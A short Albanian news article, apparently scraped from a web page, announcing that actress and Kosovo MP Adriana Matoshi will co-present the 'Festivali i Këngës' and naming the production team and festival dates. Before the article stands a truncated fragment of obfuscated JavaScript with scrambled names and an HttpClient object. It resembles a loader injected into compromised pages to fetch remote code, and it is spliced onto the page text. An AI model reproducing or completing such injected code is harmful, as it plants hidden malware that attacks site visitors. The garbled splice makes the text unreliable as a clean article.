;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Adriana Matoshi, një nga prezantueset e “Festivalit të Këngës”

By

Festivali i Këngës do të moderohet nga disa prezantues dhe njëri ndër ta është zbuluar tashmë dhe është fjala për aktoren dhe deputeten e Kuvendit të Kosovës, Adriana Matoshi.

Në konferencën për shtyp, organizatorët zbuluan se një nga prezantueset, gjithashtu pjesë e ekipit realizues, është aktorja e njohur Adriana Matoshi.

“Do të jem një prezantuese e re, që për herë të parë në jetën time marr pjesë në këtë event. Është një sfidë e madhe për mua, por si person mua më pëlqejnë sfidat. Mezi po pres që të fillojë festivali dhe të kënaqemi me këngët që i keni përzgjedhur. Suksese të gjithëve dhe uroj që të kënaqemi bashkë,” u shpreh Matoshi.

Ekipi që do të realizojë festivalin e këtij viti përbëhet nga Bojken Lako, drejtori artistik, Enkel Demi si skenarist, kantautori Elton Deda, regjisori Pali Kuke si edhe prezantuesja Adriana Matoshi.

“Festivali i Këngës” do të mbahet në datat 19, 20, 21 dhe 22 dhjetor.

Artikuj të ngjashëm